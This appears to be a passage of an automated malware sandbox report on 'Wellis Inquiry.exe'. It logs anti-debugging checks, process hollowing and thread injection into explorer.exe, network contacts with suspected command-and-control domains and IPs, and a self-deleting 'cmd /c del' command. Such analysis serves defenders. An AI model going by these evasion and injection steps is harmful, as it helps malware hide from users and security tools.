          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe	Domain query: www.marunouchi1.com
          Source: C:\Windows\explorer.exe	Network Connect: 183.90.240.3 80
          Source: C:\Windows\explorer.exe	Network Connect: 151.106.117.36 80
          Source: C:\Windows\explorer.exe	Domain query: www.richartware.com
          Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe	Domain query: www.ebookgratis.online
          Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe	Domain query: www.ovmfinacial.com
          Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe	Domain query: www.blackmagiccomics.com
          Source: C:\Windows\explorer.exe	Domain query: www.psychedeliccosmetics.com
          Source: C:\Windows\explorer.exe	Domain query: www.dollpartyla.com
          Source: C:\Windows\explorer.exe	Domain query: www.aceserial.xyz
          Source: C:\Windows\explorer.exe	Network Connect: 104.21.2.218 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 2C0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: explorer.exe, 00000004.00000000.691080863.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Users\user\Desktop\Wellis Inquiry.exe VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
